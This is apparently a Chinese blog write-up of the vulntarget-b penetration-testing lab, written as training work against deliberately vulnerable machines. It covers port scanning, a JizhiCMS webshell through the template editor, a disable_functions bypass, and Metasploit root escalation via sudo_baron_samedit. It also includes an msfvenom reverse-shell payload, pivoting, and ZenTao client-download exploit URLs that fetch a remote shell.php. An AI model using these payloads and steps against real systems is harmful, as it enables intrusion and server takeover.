Mamor's Blog
0%

vulntarget-b靶机

发表于 更新于
本文字数: 7.3k 阅读时长 ≈ 7 分钟


拓扑


1.png


环境搭建

外网机器 centos7

vim /etc/sysconfig/network-scripts/ifcfg-ens33

截图


systemctl restart networl

ifconfig ip为 10.10.10.134




外网打点

端口扫描

nmap -sV 10.10.10.134

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~]
└─$ nmap 10.10.10.134 -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 03:04 EDT
Nmap scan report for 10.10.10.134
Host is up (0.068s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Pure-FTPd
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    nginx
81/tcp   open  http    nginx
888/tcp  open  http    nginx
3306/tcp open  mysql   MySQL (unauthorized)
8888/tcp open  http    nginx

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.54 seconds


81端口 极致CMS

8888端口 宝塔

80端口 就一个主页 dirsearch没扫到东西

888端口 403


目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Target: http://10.10.10.134:81/

[03:10:56] Starting:                                                         
[03:11:04] 200 -  479B  - /404.html                                         
[03:11:04] 301 -  162B  - /A  ->  http://10.10.10.134:81/A/                 
[03:11:06] 403 -  548B  - /Public/                                          
[03:11:12] 302 -    0B  - /admin.php  ->  http://10.10.10.134:81/admin.php/Login/index.html
[03:11:22] 301 -  162B  - /backup  ->  http://10.10.10.134:81/backup/       
[03:11:22] 403 -  548B  - /backup/                                          
[03:11:24] 403 -  548B  - /cache/                                           
[03:11:24] 301 -  162B  - /cache  ->  http://10.10.10.134:81/cache/
[03:11:32] 200 -    4KB - /favicon.ico                                      
[03:11:36] 200 -  917B  - /index.html                                       
[03:11:37] 200 -    0B  - /index.php/login/                                 
[03:11:37] 200 -   14KB - /index.php                                        
[03:11:37] 301 -  162B  - /install  ->  http://10.10.10.134:81/install/     
[03:11:37] 200 -   75B  - /install/index.php?upgrade/                       
[03:11:37] 200 -   75B  - /install/
[03:11:51] 200 -   22KB - /readme.txt                                       
[03:11:51] 200 -  157B  - /robots.txt                                       
[03:11:55] 200 -  490B  - /sitemap.xml                                      
[03:11:57] 301 -  162B  - /static  ->  http://10.10.10.134:81/static/       
[03:12:02] 200 -  816B  - /web.config

找到后台登录点 admin.php 好像除了这个 别的页面都访问不了...

弱口令进入后台... (反正我没试出了/// ) admin/admin123

截图

发现当前版本为 v1.8.1 通过wapplyzer看到是 nginx


文件上传(失败)

在系统设置->基本设置->允许上传文件类型 添加 php后缀 然后再去找一个上传点

在网站管理处-->轮播图列表

商品管理-->商品列表

截图

然后提示不允许上传 ,用00截断这类的 都被重命名了 最终还是没绕过去

去网上找了下极致CMS1.8.1版本相关漏洞 看到了这么篇文章 https://xz.aliyun.com/t/9359

使用拓展管理插件getshell

模板编辑插件Getshell

截图

然后使用这个在线编辑模板

截图

然后设置一个密码 这里设置为 123321 提交后进入了代码编辑器

截图

然后就可以通过这个编辑器去查看代码 写入一句话

在index.php写一个phpinfo 然后成功生效

截图
截图

disable_function绕过

这样写一个一句话 用蚁剑连一下就可以了

截图

连上蚁剑之后没法执行命令,看了下phpinfo 禁用了好多函数 之前扫端口的时候扫到了有宝塔,应该是宝塔把函数给禁掉了

截图


尝试下蚁剑绕过disable_function的插件

使用这个php7_GC_UAF 可以成功绕过

截图

提权

后面拿第二台机器shell的时候要在这台机器上起一个ftp,普通权限起不来 然后就过来尝试下提权

试了下之前爆出的 cve-2021-4034 提权没成功,找下msf自带的提权模块试试

MSF专门提供了一个查找适用EXP的内置模块Local Exploit Suggester 然后给出了3个建议

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
msf6 auxiliary(server/socks_proxy) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester                                        

msf6 auxiliary(server/socks_proxy) > use 0
msf6 post(multi/recon/local_exploit_suggester) > options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this modu
                                               le on
   SHOWDESCRIPTION  false            yes       Displays a detailed descript
                                               ion for the available exploi
                                               ts

msf6 post(multi/recon/local_exploit_suggester) > sessions 

Active sessions
===============

  Id  Name  Type                 Information           Connection
  --  ----  ----                 -----------           ----------
  2         meterpreter x64/lin  www @ localhost.loca  10.10.10.114:3344 ->
            ux                   ldomain (uid=1001, g   10.10.10.134:43556
                                 id=1001, euid=1001,   (10.10.10.134)
                                 egid=1001) @ loca...

msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > exploit 

[*] 10.10.10.134 - Collecting local exploits for x64/linux...
[*] 10.10.10.134 - 41 exploit checks are being tried...
[+] 10.10.10.134 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 10.10.10.134 - exploit/linux/local/ptrace_traceme_pkexec_helper: The target appears to be vulnerable.
[+] 10.10.10.134 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >

这个pkexec 刚才试过了没成功,试一下sudo的这个

运行完成后可看到生成了一个新的root账户msf 密码为 nyyqeegzvjyfqa ssh连一下试试

然后成功连上ssh 权限为root权限

截图

在root目录下发现了一个flag

截图

横向第二台机器

直接上msf

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=10.10.10.114 lport=3344 -f elf > 3344.elf

截图


发现有两个网卡,一个网段为10.10.10.0/24 (公网ip为 10.10.10.134)

另一个为 10.0.20.0/24 (内网ip为10.0.20.30)

添加路由

meterpreter > run post/multi/manage/autoroute

1
2
3
4
5
[!] SESSION may not be compatible with this module (incompatible session platform: linux)                                                                 
[*] Running module against localhost.localdomain                             
[*] Searching for subnets to autoroute.                                      
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table. 
[+] Route added to subnet 10.10.10.0/255.255.255.0 from host's routing table.

端口扫描

截图

(扫了好久没扫到,突然想到机器忘记开了...离谱)

直接挂代理 用proxychains扫

截图

刚才用msf的portscan只扫到8080,用nmap扫一下

proxychains nmap -sV 10.0.20.66 扫了20分钟

截图

又发现了3306端口


然后使用浏览器挂代理访问 10.0.20.66:8080 是个禅道cms

截图

查看源码 发现是 禅道v12.4.2 找下对应漏洞

下班了 早点回去 明天再搞...

在网上找了下 只找到了该版本的后台getshell,只能尝试弱口令登录后台了...

截图

尝试5次自动锁了...然后我看了下wp,发现账号密码是 admin/Admin123 然后去试还是登录失败...(本地没登上去 kali登上去了 无语...)

ZenTao 后台getshell(失败)

1
2
3
### Exp
http://127.0.0.1/zentao/client-download-1-<base64 encode webshell download link>-1.html
http://127.0.0.1/zentao/data/client/1/<download link filename>

需要在外网机器上起一个ftp服务

python -m pyftpdlib -p 21 -d . 但是现在是普通用户 不知道权限够不够

蚁剑传一个shell.php的一句话

shell地址 ftp://10.0.20.30/shell.php

base64 ZnRwOi8vMTAuMC4yMC4zMC9zaGVsbC5waHA=

构建exp

1
http://10.0.20.66:8080/client-download-1-ZnRwOi8vMTAuMC4yMC4zMC9zaGVsbC5waHA==-1.html

访问后404 应该是外网机器权限太低 需要提权一下,再回到外网机器进行提权


提到root后 再回来打这个exp 打算起一个ftp服务 但是没有这个库 而且也没安装pip

那就考虑使用http去搞

shell地址 http://10.0.20.30:6688/shell.php

base64 aHR0cDovLzEwLjAuMjAuMzA6NjY4OC9zaGVsbC5waHA=

构造exp http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=aHR0cDovLzEwLjAuMjAuMzA6NjY4OC9zaGVsbC5waHA=

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=aHR0cDovLzEwLjAuMjAuMzA6NjY4OC9zaGVsbC5waHA=  
# 第一个直接404
http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=MTAuMC4yMC4zMDo5Njk2L3NoZWxsLnBocA==

http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=MTAuMC4yMC4zMDozMzIxL3NoZWxsLnBocA==

http://10.0.20.66:8080/client-download-1-SFRUUDovLzEwLjAuMjAuMzM6NDU2Ny8xLnBocA==-1.html


http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=MTAuMC4yMC4zMDozMzIxL3NoZWxsLnBocA==


http://10.0.20.66:8080/client-download-1-MTAuMC4yMC4zMDozMzIxL3NoZWxsLnBocA==-1.html  404
http://127.0.0.1/zentao/data/client/1/shell.php

大写HTTP

SFRUUDovLzEwLjAuMjAuMzA6MzMyMS9zaGVsbC5waHA=
http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6MzMyMS9zaGVsbC5waHA=

HTTP://10.0.20.30:3321/shell.php
SFRUUDovLzEwLjAuMjAuMzA6MzMyMS9zaGVsbC5waHA=


http://10.0.20.30:3300/1.txt

http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=aHR0cDovLzEwLjAuMjAuMzA6MzMwMC8xLnR4dA==


aHR0cDovLzEwLjAuMjAuMzA6MzMwMC8xLnR4dA==
http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=aHR0cDovLzEwLjAuMjAuMzA6MzMwMC8xLnR4dA==

尝试了好多次,只会创建一个空的shell.php 下载一句话一直失败 传不上去,然后后续我就在靶机上自行创建了一个一句话,然后访问页面可以正常访问,但是去连蚁剑啥的都连不上......无语

基本上是第二台靶机的问题了,后面的就没法再继续下去了...

References

https://n0puple.github.io/2021/07/06/%E6%9E%81%E8%87%B4cms1-7-%E5%90%8E%E5%8F%B0%E4%B8%A4%E5%A4%84getshell/

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------